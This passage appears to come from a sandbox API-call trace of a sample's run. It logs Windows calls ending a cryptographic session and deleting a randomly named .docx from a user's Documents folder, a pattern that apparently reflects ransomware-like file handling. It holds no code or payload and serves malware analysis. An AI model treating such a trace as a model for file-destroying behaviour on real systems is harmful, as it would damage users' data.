lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.218] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0215.218] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.218] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.218] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.218] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0215.218] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.218] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0215.218] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0215.218] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0215.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab968, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0215.219] CryptDestroyKey (hKey=0x9e21f8) returned 1 [0215.219] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.219] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.219] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0215.219] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.219] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0215.219] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.219] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.219] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0215.219] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0215.219] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0215.219] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0215.219] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0215.221] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0215.221] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.221] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.221] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0215.221] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.221] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0215.221] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0215.221] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.221] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.222] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.222] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.222] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.222] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0215.222] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.222] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0215.222] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.222] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.222] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0215.222] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.222] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0215.222] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.222] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.222] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.222] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.222] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.222] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.222] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.222] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.222] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.222] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.222] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.223] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.223] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.223] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.223] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.223] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0215.223] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.223] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0215.223] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.223] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.223] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0215.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6ea0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0215.223] CryptReleaseContext (hProv=0xa7bc48, dwFlags=0x0) returned 1 [0215.223] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.223] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.223] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.223] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.223] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.223] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.223] FreeLibrary (hLibModule=0x76390000) returned 1 [0215.223] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.224] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.224] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.224] CloseHandle (hObject=0x504) returned 1 [0215.225] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.225] CloseHandle (hObject=0x510) returned 1 [0215.231] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.232] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.232] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0215.232] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0215.232] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/4pPJKhvtklZXxwQ0M09.docx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\4pPJKhvtklZXxwQ0M09.docx", lpFilePart=0x8cedf4*="4pPJKhvtklZXxwQ0M09.docx") returned 0x32 [0215.232] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\4pPJKhvtklZXxwQ0M09.docx" (normalized: "c:\\users\\fd1hvy\\documents\\4ppjkhvtklzxxwq0m09.docx")) returned 0x20 [0215.232] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\4pPJKhvtklZXxwQ0M09.docx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x165c4830, ftCreationTime.dwHighDateTime=0x1d5c226, ftLastAccessTime.dwLowDateTime=0xd2602fe0, ftLastAccessTime.dwHighDateTime=0x1d552f2, ftLastWriteTime.dwLowDateTime=0xd2602fe0, ftLastWriteTime.dwHighDateTime=0x1d552f2, nFileSizeHigh=0x0, nFileSizeLow=0x67d6, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="4pPJKhvtklZXxwQ0M09.docx", cAlternateFileName="4PPJKH~1.DOC")) returned 0x9e2138 [0215.232] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\4pPJKhvtklZXxwQ0M09.docx" (normalized: "c:\\users\\fd1hvy\\documents\\4ppjkhvtklzxxwq0m09.docx")) returned 1 [0215.235] FindNextFileW (in: hFindFile=0x9e2138, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x165c4830, ftCreationTime.dwHighDateTime=0x1d5c226, ftLastAccessTime.dwLowDateTime=0xd2602fe0, ftLastAccessTime.dwHighDateTime=0x1d552f2, ftLastWriteTime.dwLowDateTime=0xd2602fe0, ftLastWriteTime.dwHighDateTime=0x1d552f2, nFileSizeHigh=0x0, nFileSizeLow=0x67d6, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="4pPJKhvtklZXxwQ0M09.docx", cAlternateFileName="4PPJKH~1.DOC")) returned 0 [0215.235] FindClose (in: hFindFile=0x9e2138 | out: hFindFile=0x9e2138) returned 1 [0215.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854a10 | out: hHeap=0x2af0000) returned 1 [0215.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0215.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0215.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0215.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.236] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0215.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0215.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0215.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0215.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0215.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0215.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0215.237] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0215.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0215.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab098 [0215.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0215.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0215.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab050 [0215.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0215.237] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0215.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0215.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0215.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0215.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0215.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0215.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0215.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0215.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0215.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0215.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0215.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0215.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0215.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0215.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0215.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854830 [0215.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0215.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0215.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0215.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0215.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0215.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0215.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0215.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0215.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0215.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0215.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0215.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0215.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0215.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x66) returned 0x29f7878 [0215.238] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/4pPJKhvtklZXxwQ0M09.docx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\4pPJKhvtklZXxwQ0M09.docx", lpFilePart=0x8cf650*="4pPJKhvtklZXxwQ0M09.docx") returned 0x32 [0215.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0215.238] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\4pPJKhvtklZXxwQ0M09.docx" (normalized: "c:\\users\\fd1hvy\\documents\\4ppjkhvtklzxxwq0m09.docx")) returned 0xffffffff [0215.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854830 | out: hHeap=0x2af0000) returned 1 [0215.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0215.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0215.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0215.239] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0215.239] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.239] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0215.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0215.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0215.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0215.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0215.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0215.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0215.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0215.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0215.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0215.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0215.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 